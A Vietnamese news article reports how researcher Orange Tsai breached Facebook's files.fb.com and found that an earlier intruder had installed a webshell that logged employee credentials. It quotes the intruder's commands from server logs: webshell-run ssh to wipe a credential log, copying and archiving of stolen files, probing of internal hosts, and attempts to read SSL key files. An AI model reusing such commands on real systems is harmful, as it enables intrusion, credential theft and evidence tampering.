Một chuyên gia bảo mật đã hack được Facebook, nhưng mọi thứ sau đó mới thật đáng sợ

    Hải Tố,  

    Máy chủ của Facebook đã bị cài backdoor, keylogger và bị xâm nhập không chỉ 1 lần...

    Internet là môi trường vô cùng phức tạp với vô số người tốt, kẻ xấu. Vì thế, rất nhiều hãng công nghệ đã không tiếc tiền treo thưởng cho những ai tìm được lỗ hổng bảo mật trong hệ thống của họ. Google đã chi gần 3 triệu USD trong năm 2015 cho chương trình Bug Bounty Program trong khi đó, Facebook - mạng xã hội lớn nhất hành tinh cũng duy trì chính sách tương tự.

    Một chuyên gia bảo mật đã phát hiện tới 7 lỗ hổng bảo mật nghiêm trọng trên Facebook, và mọi chuyện không dừng lại ở đó,...

     Facebook liệu có bảo mật như bạn nghĩ?

    Facebook liệu có bảo mật như bạn nghĩ?

    Orange Tsai, chuyên gia công nghệ của DevCore là một hacker "mũ trắng" - người chuyên săn tìm các lỗ hổng cho các công ty lớn để lấy tiền thường. Tháng 2/2016, Tsai đã bắt đầu thử sức với Facebook bằng việc cố gắng xâm nhập ứng dụng chia sẻ tập tin nội bộ của mạng xã hội lớn nhất hành tinh, cụ thể ở đây là domain files.fb.com - dịch vụ transfer, hosting và syncing file chạy trên nền tảng Secure File Transfer (FTA) do Accellion phát triển.

     Orange Tsai bắt đầu với việc xâm nhập domain files.fb.com

    Orange Tsai bắt đầu với việc xâm nhập domain files.fb.com

    Không lâu trước đó, các chuyên gia bảo mật cũng từng phát hiện ra một lỗ hổng trên FTA v0.18 (LINK).Sau khi được Accellion vá lỗi, domain files.fb.com đã nhanh chóng cập nhật lên FTA v0.20.

    Thế nhưng, sau khi tìm hiểu sâu vào sourcode (được mã hóa bằng IonCube), Tsai đã tìm ra không chỉ 1 mà tới 7 lỗ hổng bảo mật trên ứng dụng này, bao gồm: 3 lỗ hổng XSS (cross-site scripting), 1 lỗi Pre-auth SQL Injection Known-Secret-Key cho phép thực thi mã code từ xa và 2 lỗ hổng cho phép leo thang đặc quyền hệ thống (Local Privilege Escalation).

     Anh đã phát hiện ra 7 lỗ hổng bao mật, trong có đó lỗ hổng SQL injection cho phép thực thi mã code từ xa

    Anh đã phát hiện ra 7 lỗ hổng bao mật, trong có đó lỗ hổng SQL injection cho phép thực thi mã code từ xa

    Mọi chuyển trở nên dễ dàng hơn, Tsai tận dụng lỗ hổng SQL injection vừa phát hiện ở trên, truy cập vào máy chủ của Facebook và sau đó chiếm quyền kiểm soát hoàn toàn thiết bị. Cuối cùng, chuyên gia công nghệ này quyết định thông báo tới Facebook để mạng xã hội này sửa lỗi. Tuy nhiên, có 1 thứ còn đáng sợ hơn được Tsai phát hiện.

    Máy chủ của Facebook đã bị cài backdoor, keylogger và bị xâm nhập không chỉ 1 lần ...

    Trong khi nghiên cứu những file log (tập tin chứa tất cả thông tin về các hoạt động trên máy chủ, như thông tin người truy cập, thời gian khách viếng thăm, địa chỉ IP…. hay thông báo lỗi), Tsai phát hiện những thông báo lỗi rất đáng ngờ.

    Cụ thể, một webshell bí ẩn đã được "ai đó" cài lên máy chủ hoạt động như một keylogger có nhiệm vụ ghi lại tất cả thông tin đăng nhập của nhân viên Facebook trên domain files.fb.com vào file log trên.

     Mọi việc bắt đầu đáng sợ hơn khi Tsai đọc sâu vào file log

    Mọi việc bắt đầu "đáng sợ" hơn khi Tsai đọc sâu vào file log

     Và phát hiện máy chủ Facebook đã bị cài webshell

    Và phát hiện máy chủ Facebook đã bị cài webshell

     Keylogger ghi lại username & password của nhân viên Facebook

    Keylogger ghi lại username & password của nhân viên Facebook

    Sau 1 khoảng thời gian nhất định, hacker lại xâm nhập vào máy chủ Facebook để xóa dấu vết

    192.168.54.13 - - 17955 [Sat, 23 Jan 2016 19:04:10 0000 | 1453575850] "GET /courier/custom_template/1000/bN3dl0Aw.php?c=./sshpass -p '********' ssh -v -o StrictHostKeyChecking=no soggycat@localhost 'cp /home/seos/courier/B3dKe9sQaa0L.log /home/seos/courier/B3dKe9sQaa0L.log.2; echo > /home/seos/courier/B3dKe9sQaa0L.log' 2>/dev/stdout HTTP/1.1" 200 2559 ...

    Lấy thông tin dữ liệu từ file log

    cat tmp_list3_2 | while read line; do cp /home/filex2/1000/$line files; done 2>/dev/stdout

    tar -czvf files.tar.gz files

    Truy cập hệ thống mail nội bộ của Facebook:

    --20:38:09-- https://mail.thefacebook.com/

    Resolving mail.thefacebook.com... 192.168.52.37

    Connecting to mail.thefacebook.com|192.168.52.37|:443... connected.

    HTTP request sent, awaiting response... 302 Found

    Location: https://mail.thefacebook.com/owa/ [following]

    --20:38:10-- https://mail.thefacebook.com/owa/

    Reusing existing connection to mail.thefacebook.com:443.

    HTTP request sent, awaiting response... 302 Moved Temporarily

    Location: https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0 [following]

    --20:38:10-- https://mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/&reason=0

    Reusing existing connection to mail.thefacebook.com:443.

    HTTP request sent, awaiting response... 200 OK

    Length: 8902 (8.7K) [text/html]

    Saving to: `STDOUT'

    0K ........ 100% 1.17G=0s

    20:38:10 (1.17 GB/s) - `-' saved [8902/8902]

    --20:38:33-- (try:15) https://10.8.151.47/

    Connecting to 10.8.151.47:443... --20:38:51-- https://svn.thefacebook.com/

    Resolving svn.thefacebook.com... failed: Name or service not known.

    --20:39:03-- https://sb-dev.thefacebook.com/

    Resolving sb-dev.thefacebook.com... failed: Name or service not known.

    failed: Connection timed out.

    Retrying.

    Nghiêm trọng hơn, hacker này còn cố gắng đánh cắp SSL Key:

    sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

    ls: /etc/opt/apache/ssl.key/server.key: No such file or directory

    mv: cannot stat `x': No such file or directory

    sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

    mv: cannot stat `x': No such file or directory

    sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

    mv: cannot stat `x': No such file or directory

    sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

    mv: cannot stat `x': No such file or directory

    sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

    mv: cannot stat `x': No such file or directory

    sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied

    base64: invalid input

     SSL Key xác thực là *.fb.com

    SSL Key xác thực là *.fb.com

    Tiếp tục điều tra những file log khác trên hệ thống, Tsai đã xác định được cách thức, thời điểm hacker xâm nhập vào hệ thống máy chủ Facebook, vào tháng 7/2015 và 9/2015 để thu thập dữ liệu trên file log, đánh cắp SSL Key cũng như xóa dấu vết. Chuyên gia bảo mật này cũng khẳng định, đứng sau những lần tấn công vào hệ thống trên của Facebook là 1 người (nhóm người) mà thôi.

    Sau khi thu thập tất cả thông tin, hình ảnh cùng những file log bị nghi ngờ, Tsai đã ngay lập tức báo cáo với đội bảo mật Facebook. Ngay lập tức, mạng xã hội này đã tiến hành điều tra lỗ hổng bảo mật trên, bên cạnh việc trao thưởng cho chuyên gia này số tiền 10.000 USD (hơn 220 triệu đồng).

    Tham khảo: devco

    Tin cùng chuyên mục
    Xem theo ngày

    NỔI BẬT TRANG CHỦ